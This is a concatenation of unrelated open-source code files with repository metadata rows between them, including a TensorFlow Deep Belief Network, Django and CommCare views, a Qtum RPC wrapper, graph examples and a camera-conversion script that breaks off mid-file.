self._last_idx[test.procid] = num
return self._send_test(create_subtest(num))
return False
| 31.390625 | 79 | 0.702837 |
32b2d9c80ff1b649d0068bcb9fa2e54813dc500c | 9,827 | py | Python | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | yadlt/models/rbm_models/dbn.py | Perfect-SoftwareEngineer/Deep-Learning-Tensorflow | b191cd2c8ff9d8cb6e2c6dedcac4483fa7548366 | [
"MIT"
] | null | null | null | """Implementation of Deep Belief Network Model using TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from yadlt.core import SupervisedModel
from yadlt.core import Trainer
from yadlt.models.rbm_models import rbm
from yadlt.utils import utilities
class DeepBeliefNetwork(SupervisedModel):
"""Implementation of Deep Belief Network for Supervised Learning.
The interface of the class is sklearn-like.
"""
def __init__(
self, rbm_layers, name='dbn', do_pretrain=False,
rbm_num_epochs=[10], rbm_gibbs_k=[1],
rbm_gauss_visible=False, rbm_stddev=0.1, rbm_batch_size=[10],
rbm_learning_rate=[0.01], finetune_dropout=1,
finetune_loss_func='softmax_cross_entropy',
finetune_act_func=tf.nn.sigmoid, finetune_opt='gradient_descent',
finetune_learning_rate=0.001, finetune_num_epochs=10,
finetune_batch_size=20, verbose=1, momentum=0.5,):
"""Constructor.
:param rbm_layers: list containing the hidden units for each layer
:param finetune_loss_func: Loss function for the softmax layer.
string, default ['softmax_cross_entropy', 'mean_squared']
:param finetune_dropout: dropout parameter
:param finetune_learning_rate: learning rate for the finetuning.
float, default 0.001
:param finetune_act_func: activation function for the finetuning phase
:param finetune_opt: optimizer for the finetuning phase
:param finetune_num_epochs: Number of epochs for the finetuning.
int, default 20
:param finetune_batch_size: Size of each mini-batch for the finetuning.
int, default 20
:param verbose: Level of verbosity. 0 - silent, 1 - print accuracy.
int, default 0
:param do_pretrain: True: uses variables from pretraining,
False: initialize new variables.
"""
SupervisedModel.__init__(self, name)
self.momentum = momentum
self.do_pretrain = do_pretrain
self.layers = rbm_layers
self.finetune_act_func = finetune_act_func
self.verbose = verbose
# Model parameters
self.encoding_w_ = [] # list of matrices of encoding weights per layer
self.encoding_b_ = [] # list of arrays of encoding biases per layer
self.softmax_W = None
self.softmax_b = None
rbm_params = {
'num_epochs': rbm_num_epochs, 'gibbs_k': rbm_gibbs_k,
'batch_size': rbm_batch_size, 'learning_rate': rbm_learning_rate}
for p in rbm_params:
if len(rbm_params[p]) != len(rbm_layers):
# The current parameter is not specified by the user,
# should default it for all the layers
rbm_params[p] = [rbm_params[p][0] for _ in rbm_layers]
self.rbms = []
self.rbm_graphs = []
for l, layer in enumerate(rbm_layers):
rbm_str = 'rbm-' + str(l+1)
if l == 0 and rbm_gauss_visible:
self.rbms.append(
rbm.RBM(
name=self.name + '-' + rbm_str,
num_hidden=layer,
learning_rate=rbm_params['learning_rate'][l],
verbose=self.verbose,
num_epochs=rbm_params['num_epochs'][l],
batch_size=rbm_params['batch_size'][l],
gibbs_sampling_steps=rbm_params['gibbs_k'][l],
visible_unit_type='gauss', stddev=rbm_stddev))
else:
self.rbms.append(
rbm.RBM(
name=self.name + '-' + rbm_str,
num_hidden=layer,
learning_rate=rbm_params['learning_rate'][l],
verbose=self.verbose,
num_epochs=rbm_params['num_epochs'][l],
batch_size=rbm_params['batch_size'][l],
gibbs_sampling_steps=rbm_params['gibbs_k'][l]))
self.rbm_graphs.append(tf.Graph())
def pretrain(self, train_set, validation_set=None):
"""Perform Unsupervised pretraining of the DBN."""
self.do_pretrain = True
def set_params_func(rbmmachine, rbmgraph):
params = rbmmachine.get_parameters(graph=rbmgraph)
self.encoding_w_.append(params['W'])
self.encoding_b_.append(params['bh_'])
return SupervisedModel.pretrain_procedure(
self, self.rbms, self.rbm_graphs, set_params_func=set_params_func,
train_set=train_set, validation_set=validation_set)
def _train_model(self, train_set, train_labels,
validation_set, validation_labels):
"""Train the model.
:param train_set: training set
:param train_labels: training labels
:param validation_set: validation set
:param validation_labels: validation labels
:return: self
"""
        shuff = list(zip(train_set, train_labels))  # list() so np.random.shuffle can reorder it in place
for i in range(self.num_epochs):
np.random.shuffle(shuff)
batches = [_ for _ in utilities.gen_batches(
shuff, self.batch_size)]
for batch in batches:
x_batch, y_batch = zip(*batch)
self.tf_session.run(
self.train_step, feed_dict={
self.input_data: x_batch,
self.input_labels: y_batch,
self.keep_prob: self.dropout})
if validation_set is not None:
feed = {self.input_data: validation_set,
self.input_labels: validation_labels,
self.keep_prob: 1}
self._run_validation_error_and_summaries(i, feed)
def build_model(self, n_features, n_classes):
"""Create the computational graph.
This graph is intented to be created for finetuning,
i.e. after unsupervised pretraining.
:param n_features: Number of features.
:param n_classes: number of classes.
:return: self
"""
self._create_placeholders(n_features, n_classes)
self._create_variables(n_features)
next_train = self._create_encoding_layers()
last_out = self._create_last_layer(next_train, n_classes)
self._create_cost_function_node(last_out, self.input_labels)
self.train_step = Trainer(self.opt, learning_rate=self.learning_rate,
momentum=self.momentum).compile(self.cost)
self._create_accuracy_test_node()
def _create_placeholders(self, n_features, n_classes):
"""Create the TensorFlow placeholders for the model.
:param n_features: number of features of the first layer
:param n_classes: number of classes
:return: self
"""
self.input_data = tf.placeholder(
tf.float32, [None, n_features], name='x-input')
self.input_labels = tf.placeholder(
tf.float32, [None, n_classes], name='y-input')
self.keep_prob = tf.placeholder(tf.float32, name='keep-probs')
def _create_variables(self, n_features):
"""Create the TensorFlow variables for the model.
:param n_features: number of features
:return: self
"""
if self.do_pretrain:
self._create_variables_pretrain()
else:
self._create_variables_no_pretrain(n_features)
def _create_variables_no_pretrain(self, n_features):
"""Create model variables (no previous unsupervised pretraining).
:param n_features: number of features
:return: self
"""
self.encoding_w_ = []
self.encoding_b_ = []
for l, layer in enumerate(self.layers):
if l == 0:
self.encoding_w_.append(tf.Variable(tf.truncated_normal(
shape=[n_features, self.layers[l]], stddev=0.1)))
self.encoding_b_.append(tf.Variable(tf.constant(
0.1, shape=[self.layers[l]])))
else:
self.encoding_w_.append(tf.Variable(tf.truncated_normal(
shape=[self.layers[l-1], self.layers[l]], stddev=0.1)))
self.encoding_b_.append(tf.Variable(tf.constant(
0.1, shape=[self.layers[l]])))
def _create_variables_pretrain(self):
"""Create model variables (previous unsupervised pretraining).
:return: self
"""
for l, layer in enumerate(self.layers):
self.encoding_w_[l] = tf.Variable(
self.encoding_w_[l], name='enc-w-{}'.format(l))
self.encoding_b_[l] = tf.Variable(
self.encoding_b_[l], name='enc-b-{}'.format(l))
def _create_encoding_layers(self):
"""Create the encoding layers for supervised finetuning.
:return: output of the final encoding layer.
"""
next_train = self.input_data
self.layer_nodes = []
for l, layer in enumerate(self.layers):
with tf.name_scope("encode-{}".format(l)):
y_act = tf.add(
tf.matmul(next_train, self.encoding_w_[l]),
self.encoding_b_[l]
)
if self.finetune_act_func:
layer_y = self.finetune_act_func(y_act)
else:
layer_y = None
# the input to the next layer is the output of this layer
next_train = tf.nn.dropout(layer_y, self.keep_prob)
self.layer_nodes.append(next_train)
return next_train
| 37.796154 | 79 | 0.599878 |
5b213703e459353de060af515445d270e2c4de15 | 613 | py | Python | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | null | null | null | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | 5 | 2021-06-09T17:54:51.000Z | 2022-03-12T00:46:49.000Z | apps/characters/migrations/0011_auto_20210805_1121.py | lucasjaroszewski/incremental-game | bae8823f986be0fd046bd50195d43fbc548fad90 | [
"MIT"
] | 1 | 2020-09-27T18:26:15.000Z | 2020-09-27T18:26:15.000Z | # Generated by Django 3.1.2 on 2021-08-05 14:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('characters', '0010_character_dungeon'),
]
operations = [
migrations.AddField(
model_name='character',
name='icon',
field=models.CharField(default='', help_text='Icon URL', max_length=255),
),
migrations.AlterField(
model_name='character',
name='image',
field=models.CharField(default='', help_text='Image URL', max_length=255),
),
]
| 25.541667 | 86 | 0.588907 |
6ef1794adad2e16f95309d0afebcfaf150bd46be | 15,459 | py | Python | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/commtrack/views.py | dborowiecki/commcare-hq | f2f4fa67faec09040a98502f5657444075b63f2e | [
"BSD-3-Clause"
] | null | null | null | import copy
import json
from django.contrib import messages
from django.http import Http404, HttpResponseBadRequest, HttpResponseRedirect
from django.urls import reverse
from django.utils.decorators import method_decorator
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop
from memoized import memoized
from casexml.apps.stock.models import StockTransaction
from corehq import toggles
from corehq.apps.commtrack.const import SUPPLY_POINT_CASE_TYPE
from corehq.apps.commtrack.processing import (
plan_rebuild_stock_state,
rebuild_stock_state,
)
from corehq.apps.domain.decorators import domain_admin_required
from corehq.apps.domain.views.base import BaseDomainView
from corehq.apps.hqwebapp.decorators import use_jquery_ui
from corehq.apps.hqwebapp.doc_info import get_doc_info_by_id
from corehq.apps.locations.models import LocationType, SQLLocation
from corehq.form_processor.exceptions import XFormNotFound
from corehq.form_processor.interfaces.dbaccessors import FormAccessors
from corehq.util.timezones.conversions import ServerTime
from .forms import CommTrackSettingsForm, ConsumptionForm, StockLevelsForm
from .models import CommtrackActionConfig, StockRestoreConfig
from .tasks import recalculate_domain_consumption_task
from .util import all_sms_codes
@domain_admin_required
def default(request, domain):
if not (request.project and request.project.commtrack_enabled):
raise Http404()
return HttpResponseRedirect(default_commtrack_url(domain))
def default_commtrack_url(domain):
from corehq.apps.products.views import ProductListView
return reverse(ProductListView.urlname, args=[domain])
class BaseCommTrackManageView(BaseDomainView):
section_name = ugettext_noop("Setup")
@property
def section_url(self):
return reverse('default_commtrack_setup', args=[self.domain])
def get(self, *args, **kwargs):
if self.domain_object.commtrack_settings is None:
raise Http404()
return super(BaseCommTrackManageView, self).get(*args, **kwargs)
@method_decorator(domain_admin_required) # TODO: will probably want less restrictive permission?
def dispatch(self, request, *args, **kwargs):
return super(BaseCommTrackManageView, self).dispatch(request, *args, **kwargs)
class CommTrackSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_settings'
page_title = ugettext_noop("Advanced Settings")
template_name = 'domain/admin/commtrack_settings.html'
@property
@memoized
def commtrack_settings(self):
return self.domain_object.commtrack_settings
@property
def page_context(self):
return {
'form': self.commtrack_settings_form
}
@property
@memoized
def commtrack_settings_form(self):
initial = self.commtrack_settings.to_json()
initial.update(dict(('consumption_' + k, v) for k, v in
self.commtrack_settings.consumption_config.to_json().items()))
initial.update(dict(('stock_' + k, v) for k, v in
self.commtrack_settings.stock_levels_config.to_json().items()))
if self.request.method == 'POST':
return CommTrackSettingsForm(self.request.POST, initial=initial, domain=self.domain)
return CommTrackSettingsForm(initial=initial, domain=self.domain)
def set_ota_restore_config(self):
"""
If the checkbox for syncing consumption fixtures is
checked, then we build the restore config with appropriate
special properties, otherwise just clear the object.
        If a way to tweak these is ever added to the UI, this should
        be done differently.
"""
if self.commtrack_settings.sync_consumption_fixtures:
self.domain_object.commtrack_settings.ota_restore_config = StockRestoreConfig(
section_to_consumption_types={
'stock': 'consumption'
},
force_consumption_case_types=[
SUPPLY_POINT_CASE_TYPE
],
use_dynamic_product_list=True,
)
else:
self.domain_object.commtrack_settings.ota_restore_config = StockRestoreConfig()
def post(self, request, *args, **kwargs):
if self.commtrack_settings_form.is_valid():
data = self.commtrack_settings_form.cleaned_data
previous_config = copy.copy(self.commtrack_settings)
self.commtrack_settings.use_auto_consumption = bool(data.get('use_auto_consumption'))
self.commtrack_settings.sync_consumption_fixtures = bool(data.get('sync_consumption_fixtures'))
self.commtrack_settings.individual_consumption_defaults = bool(data.get('individual_consumption_defaults'))
self.set_ota_restore_config()
fields = ('emergency_level', 'understock_threshold', 'overstock_threshold')
for field in fields:
if data.get('stock_' + field):
setattr(self.commtrack_settings.stock_levels_config, field,
data['stock_' + field])
consumption_fields = ('min_transactions', 'min_window', 'optimal_window')
for field in consumption_fields:
if data.get('consumption_' + field):
setattr(self.commtrack_settings.consumption_config, field,
data['consumption_' + field])
self.commtrack_settings.save()
for loc_type in LocationType.objects.filter(domain=self.domain).all():
# This will update stock levels based on commtrack config
loc_type.save()
if (previous_config.use_auto_consumption != self.commtrack_settings.use_auto_consumption
or previous_config.consumption_config.to_json() != self.commtrack_settings.consumption_config.to_json()
):
# kick off delayed consumption rebuild
recalculate_domain_consumption_task.delay(self.domain)
messages.success(request, _("Settings updated! Your updated consumption settings may take a "
"few minutes to show up in reports and on phones."))
else:
messages.success(request, _("Settings updated!"))
return HttpResponseRedirect(self.page_url)
return self.get(request, *args, **kwargs)
class DefaultConsumptionView(BaseCommTrackManageView):
urlname = 'update_default_consumption'
template_name = 'commtrack/manage/default_consumption.html'
page_title = ugettext_noop("Consumption")
@property
@memoized
def consumption_form(self):
if self.request.method == 'POST':
return ConsumptionForm(self.domain, self.request.POST)
return ConsumptionForm(self.domain)
@property
def page_context(self):
return {
'form': self.consumption_form,
}
def post(self, request, *args, **kwargs):
if self.consumption_form.is_valid():
self.consumption_form.save()
messages.success(request, _("Default consumption values updated"))
return HttpResponseRedirect(
reverse(DefaultConsumptionView.urlname, args=[self.domain])
)
return self.get(request, *args, **kwargs)
class SMSSettingsView(BaseCommTrackManageView):
urlname = 'commtrack_sms_settings'
page_title = ugettext_noop("SMS")
template_name = 'domain/admin/sms_settings.html'
@property
def page_context(self):
return {
'other_sms_codes': dict(self.get_other_sms_codes()),
'settings': self.settings_context,
}
@property
def settings_context(self):
return {
'actions': [self._get_action_info(a) for a in self.domain_object.commtrack_settings.actions],
}
# FIXME
def _get_action_info(self, action):
return {
'type': action.action,
'keyword': action.keyword,
'name': action.subaction,
'caption': action.caption,
}
def get_other_sms_codes(self):
for k, v in all_sms_codes(self.domain).items():
if v[0] == 'product':
yield (k, (v[0], v[1].name))
def post(self, request, *args, **kwargs):
payload = json.loads(request.POST.get('json'))
def mk_action(action):
return CommtrackActionConfig(**{
'action': action['type'],
'subaction': action['caption'],
'keyword': action['keyword'],
'caption': action['caption'],
})
# TODO add server-side input validation here (currently validated on client)
self.domain_object.commtrack_settings.actions = [mk_action(a) for a in payload['actions']]
self.domain_object.commtrack_settings.save()
return self.get(request, *args, **kwargs)
@use_jquery_ui
def dispatch(self, request, *args, **kwargs):
return super(SMSSettingsView, self).dispatch(request, *args, **kwargs)
class StockLevelsView(BaseCommTrackManageView):
urlname = 'stock_levels'
page_title = ugettext_noop("Stock Levels")
template_name = 'commtrack/manage/stock_levels.html'
@method_decorator(toggles.LOCATION_TYPE_STOCK_RATES.required_decorator())
def dispatch(self, *args, **kwargs):
return super(StockLevelsView, self).dispatch(*args, **kwargs)
def get_existing_stock_levels(self):
loc_types = LocationType.objects.by_domain(self.domain)
return [{
'loc_type': loc_type.name,
'emergency_level': loc_type.emergency_level,
'understock_threshold': loc_type.understock_threshold,
'overstock_threshold': loc_type.overstock_threshold,
} for loc_type in loc_types]
def save_stock_levels(self, levels):
"""
Accepts a list of dicts of the form returned by
get_existing_stock_levels and writes to the appropriate LocationType
"""
levels = {level['loc_type']: level for level in levels}
for loc_type in LocationType.objects.filter(domain=self.domain).all():
if loc_type.name not in levels:
continue
stock_levels = levels[loc_type.name]
changed = False
for threshold in [
'emergency_level',
'understock_threshold',
'overstock_threshold'
]:
if getattr(loc_type, threshold) != stock_levels[threshold]:
setattr(loc_type, threshold, stock_levels[threshold])
changed = True
if changed:
loc_type.save()
@property
def page_context(self):
return {
'stock_levels_form': self.stock_levels_form
}
@property
@memoized
def stock_levels_form(self):
if self.request.method == "POST":
data = self.request.POST
else:
data = self.get_existing_stock_levels()
return StockLevelsForm(data, request=self.request)
def post(self, request, *args, **kwargs):
if self.stock_levels_form.is_valid():
self.save_stock_levels(self.stock_levels_form.cleaned_data)
return HttpResponseRedirect(self.page_url)
# TODO display error messages to the user...
return self.get(request, *args, **kwargs)
class RebuildStockStateView(BaseCommTrackManageView):
urlname = 'rebuild_stock_state'
page_title = ugettext_noop("Rebuild Stock State")
template_name = 'commtrack/manage/rebuild_stock_state.html'
@memoized
def get_server_date_by_form_id(self, form_id):
try:
server_date = FormAccessors(self.domain).get_form(form_id).received_on
except XFormNotFound:
return None
else:
return ServerTime(server_date).ui_string()
def _get_selected_case_id(self):
location_id = self.request.GET.get('location_id')
if location_id:
try:
return (SQLLocation.objects
.get(domain=self.domain, location_id=location_id)
.supply_point_id)
except SQLLocation.DoesNotExist:
messages.error(self.request, 'Your location id did not match a location')
@property
def page_context(self, **kwargs):
stock_state_limit = int(self.request.GET.get('stock_state_limit', 100))
stock_transaction_limit = int(self.request.GET.get('stock_transaction_limit', 1000))
stock_state_limit_exceeded = False
stock_transaction_limit_exceeded = False
query = StockTransaction.objects.filter(report__domain=self.domain)
selected_case_id = self._get_selected_case_id()
if selected_case_id:
query = query.filter(case_id=selected_case_id)
selected_product_id = self.request.GET.get('product_id')
if selected_product_id:
query = query.filter(product_id=selected_product_id)
stock_state_keys = [
(txn.case_id, txn.section_id, txn.product_id)
for txn in query
.order_by('case_id', 'section_id', 'product_id')
.distinct('case_id', 'section_id', 'product_id')
[:stock_state_limit]
]
if len(stock_state_keys) >= stock_state_limit:
stock_state_limit_exceeded = True
actions_by_stock_state_key = []
stock_transaction_count = 0
for stock_state_key in stock_state_keys:
actions = self.get_actions_by_stock_state_key(*stock_state_key)
stock_transaction_count += len(actions[1])
if stock_transaction_count > stock_transaction_limit:
stock_transaction_limit_exceeded = True
break
actions_by_stock_state_key.append(actions)
assert len(set(stock_state_keys)) == len(stock_state_keys)
return {
'actions_by_stock_state_key': actions_by_stock_state_key,
'stock_state_limit_exceeded': stock_state_limit_exceeded,
'stock_state_limit': stock_state_limit,
'stock_transaction_limit_exceeded': stock_transaction_limit_exceeded,
'stock_transaction_limit': stock_transaction_limit,
}
def get_actions_by_stock_state_key(self, case_id, section_id, product_id):
actions = [
(
action.__class__.__name__,
action,
self.get_server_date_by_form_id(
action.stock_transaction.report.form_id),
) for action in
plan_rebuild_stock_state(case_id, section_id, product_id)
]
return (
{'case_id': case_id,
'section_id': section_id,
'product_id': product_id},
actions,
get_doc_info_by_id(self.domain, case_id)
)
def post(self, request, *args, **kwargs):
case_id = request.POST.get('case_id')
section_id = request.POST.get('section_id')
product_id = request.POST.get('product_id')
if None in (case_id, section_id, product_id):
return HttpResponseBadRequest()
rebuild_stock_state(case_id, section_id, product_id)
return HttpResponseRedirect('.')
| 38.744361 | 119 | 0.658322 |
0fed691331ec28b7b1c0a4f324a6a7d490515ab6 | 2,331 | py | Python | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | ooobuild/cssdyn/uri/__init__.py | Amourspirit/ooo_uno_tmpl | 64e0c86fd68f24794acc22d63d8d32ae05dd12b8 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ...dyn.uri.external_uri_reference_translator import ExternalUriReferenceTranslator as ExternalUriReferenceTranslator
from ...dyn.uri.relative_uri_excess_parent_segments import RelativeUriExcessParentSegments as RelativeUriExcessParentSegments
from ...dyn.uri.uri_reference_factory import UriReferenceFactory as UriReferenceFactory
from ...dyn.uri.uri_scheme_parser_vnd_do_tsun_do_tstar_do_texpand import UriSchemeParser_vndDOTsunDOTstarDOTexpand as UriSchemeParser_vndDOTsunDOTstarDOTexpand
from ...dyn.uri.uri_scheme_parser_vnd_do_tsun_do_tstar_do_tscript import UriSchemeParser_vndDOTsunDOTstarDOTscript as UriSchemeParser_vndDOTsunDOTstarDOTscript
from ...dyn.uri.vnd_sun_star_pkg_url_reference_factory import VndSunStarPkgUrlReferenceFactory as VndSunStarPkgUrlReferenceFactory
from ...dyn.uri.x_external_uri_reference_translator import XExternalUriReferenceTranslator as XExternalUriReferenceTranslator
from ...dyn.uri.x_uri_reference import XUriReference as XUriReference
from ...dyn.uri.x_uri_reference_factory import XUriReferenceFactory as XUriReferenceFactory
from ...dyn.uri.x_uri_scheme_parser import XUriSchemeParser as XUriSchemeParser
from ...dyn.uri.x_vnd_sun_star_expand_url import XVndSunStarExpandUrl as XVndSunStarExpandUrl
from ...dyn.uri.x_vnd_sun_star_expand_url_reference import XVndSunStarExpandUrlReference as XVndSunStarExpandUrlReference
from ...dyn.uri.x_vnd_sun_star_pkg_url_reference_factory import XVndSunStarPkgUrlReferenceFactory as XVndSunStarPkgUrlReferenceFactory
from ...dyn.uri.x_vnd_sun_star_script_url import XVndSunStarScriptUrl as XVndSunStarScriptUrl
from ...dyn.uri.x_vnd_sun_star_script_url_reference import XVndSunStarScriptUrlReference as XVndSunStarScriptUrlReference
| 72.84375 | 159 | 0.864436 |
3cfb0239d1bcb7d0709aeb8f5511cdb95f205d48 | 1,298 | py | Python | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | 1 | 2021-02-28T07:43:59.000Z | 2021-02-28T07:43:59.000Z | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | null | null | null | Notes/Sprint3/graphs2.py | mark-morelos/CS_Notes | 339c47ae5d7e678b7ac98d6d78857d016c611e38 | [
"MIT"
] | 1 | 2021-03-03T03:52:21.000Z | 2021-03-03T03:52:21.000Z | # Adjacency Matrix
graph_matrix = [
[0,1,0,0,0],
[1,0,1,1,1],
[0,1,0,1,0],
[0,1,1,0,0],
[0,1,0,0,0]
]
# What are my neighbors for A?
# graph_matrix[0] # <- all the neighbors for A
# Is B and C connected?
# graph_matrix[1][2] == 1 # returns True
# Add connection from A to C
# graph_matrix[0][2] = 1 # we have now made a connection from A to C
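# Runnable sketch of the queries above (assumes the index mapping A=0, B=1, C=2, D=3, E=4):
print(graph_matrix[0])          # [0, 1, 0, 0, 0] -> A's only neighbor is B
print(graph_matrix[1][2] == 1)  # True -> B and C are connected
graph_matrix[0][2] = 1          # connect A to C
print(graph_matrix[0])          # [0, 1, 1, 0, 0]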
# Adjacency List
graph_list = {
'A': {'B'},
'B': {'C', 'D', 'E'},
'C': {'D'},
'D': set(),
'E': set()
}
# What are my neighbors for A?
# graph_list['A'] # <- the set of all neighbors for A
# Is C and B connected?
# 'C' in graph_list['B'] # this will return True
# Add connection from A to C
# graph_list['A'].add('C')
# Add a new vertex and connect A and C to it
graph_list['F'] = {'C'}
graph_list['A'].add('F')
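# Runnable sketch of the adjacency-list queries above:
print(graph_list['A'])         # e.g. {'B', 'F'} (set order is not guaranteed)
print('C' in graph_list['B'])  # True -> B and C are connected
print('F' in graph_list['A'])  # True -> A and F were just connected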
def print_paths(graph, start_vertex, current_path=None):
    # avoid a mutable default argument that would be shared between calls
    if current_path is None:
        current_path = []
    current_path.append(start_vertex)
# if no neighbors, print the path
if len(graph[start_vertex]) == 0:
print(current_path)
# For each neighbor, call print_paths, with the current_path containing our current_vertex
for neighbor in graph[start_vertex]:
# make a copy of the path
new_path = current_path.copy()
print_paths(graph, neighbor, new_path)
print_paths(graph_list, "A", []) | 22.37931 | 94 | 0.605547 |
fe4089fba1ead6c598bc32577e8b43f0d06dffac | 1,838 | py | Python | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | pdms/qtum_bridge/R8Blockchain/qtumblockchain.py | chris0203/pmes | 97df332b859803e9953f983dda3ca47d4bc35758 | [
"Apache-2.0"
] | null | null | null | from bitcoinrpc.authproxy import AuthServiceProxy
from hashlib import sha256
from R8Blockchain.blockchain_handler import BlockchainHandler
import codecs
import logging
class QtumBlockchain(BlockchainHandler):
def __init__(self, qtum_rpc):
self.qtum_rpc = qtum_rpc
self.decode_hex = codecs.getdecoder("hex_codec")
self.encode_hex = codecs.getencoder("hex_codec")
@classmethod
def from_http_provider(cls, http_provider):
return cls(AuthServiceProxy(http_provider))
def get_block_count(self):
return self.qtum_rpc.getblockcount()
def get_balance(self):
return self.qtum_rpc.getbalance()
def get_last_block_hash(self):
return self.qtum_rpc.getbestblockhash()
def get_second_last_block_hash(self):
return self.get_block_hash(self.get_block_count()-1)
def get_block_hash(self, height):
return self.qtum_rpc.getblockhash(height)
def get_block_id(self, height):
block_hash = self.get_block_hash(height)
l = sha256(self.decode_hex(block_hash)[0]).hexdigest()
r = hex(height)
return l[0:10] + r[2:].rjust(10, '0')
def get_last_block_id(self):
last_block_height = self.get_block_count()
return self.get_block_id(last_block_height)
def get_second_last_block_id(self):
last_block_height = self.get_block_count() - 1
return self.get_block_id(last_block_height)
def get_accounts(self):
unspent = self.qtum_rpc.listunspent()
res = [tx['address'] for tx in unspent]
return res
def get_unspent(self):
unspent = self.qtum_rpc.listunspent()
res = {tx['address']: tx['amount'] for tx in unspent}
return res
def from_hex_address(self, address):
return self.qtum_rpc.fromhexaddress(address)
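# Usage sketch (the endpoint below is a placeholder; substitute the RPC user,
# password, host and port of an actual Qtum node):
# handler = QtumBlockchain.from_http_provider("http://user:password@127.0.0.1:3889")
# print(handler.get_block_count())
# print(handler.get_last_block_id())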
| 27.432836 | 62 | 0.692057 |
387483e127d508384db2c3e2f97efcfaeda0cefa | 4,916 | py | Python | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 19 | 2021-11-18T19:29:16.000Z | 2022-02-23T01:55:51.000Z | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 13 | 2021-11-30T17:14:46.000Z | 2022-03-22T21:38:33.000Z | dense_map/geometry_mapper/tools/cameras_to_texrecon.py | CodeMasterBond/isaac | b21a533cf30eed012fe12ece047b6d87418d7c6f | [
"Apache-2.0"
] | 6 | 2021-12-03T02:38:21.000Z | 2022-02-23T01:52:03.000Z | # Copyright (c) 2021, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
#
# All rights reserved.
#
# The "ISAAC - Integrated System for Autonomous and Adaptive Caretaking
# platform" software is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# Create camera files that texrecon will understand.
import argparse
import glob
import os
import re
import sys
import numpy as np
parser = argparse.ArgumentParser(
description="Convert cameras to the format of texrecon."
)
parser.add_argument(
"--camera_dir",
default="",
help="The directory containing the camera information (the output of geometry_mapper).",
)
parser.add_argument(
"--undistorted_image_dir",
default="",
help="The directory containing the undistorted images.",
)
parser.add_argument(
"--camera_type",
default="",
help="The camera type (nav_cam, haz_cam, or sci_cam, etc.).",
)
args = parser.parse_args()
if args.camera_dir == "" or args.undistorted_image_dir == "" or args.camera_type == "":
print(
"Must specify the camera directory, directory of undistorted images, and camera type."
)
sys.exit(1)
# Read the intrinsics
intr_file = args.undistorted_image_dir + "/undistorted_intrinsics.txt"
if not os.path.exists(intr_file):
print("Missing file: " + intr_file)
sys.exit(1)
with open(intr_file, "r") as f:
for line in f:
if re.match("^\s*\#", line):
continue # ignore the comments
vals = line.split()
if len(vals) < 5:
print("Expecting 5 parameters in " + intr_file)
sys.exit(1)
widx = float(vals[0])
widy = float(vals[1])
f = float(vals[2])
cx = float(vals[3])
cy = float(vals[4])
max_wid = widx
if widy > max_wid:
max_wid = widy
# normalize
nf = f / max_wid
ncx = cx / widx
ncy = cy / widy
d0 = 0.0
d1 = 0.0
paspect = 1.0
break # finished reading the line we care for
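# Worked example with illustrative numbers: for a 1280x960 image with f = 600,
# cx = 640, cy = 480, max_wid is 1280, so nf = 600/1280 = 0.46875,
# ncx = 640/1280 = 0.5 and ncy = 480/960 = 0.5.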
# Convert the cameras to texrecon's format
suffix = "_" + args.camera_type + "_to_world.txt"
# Get the cameras to write based on the list of images in the index
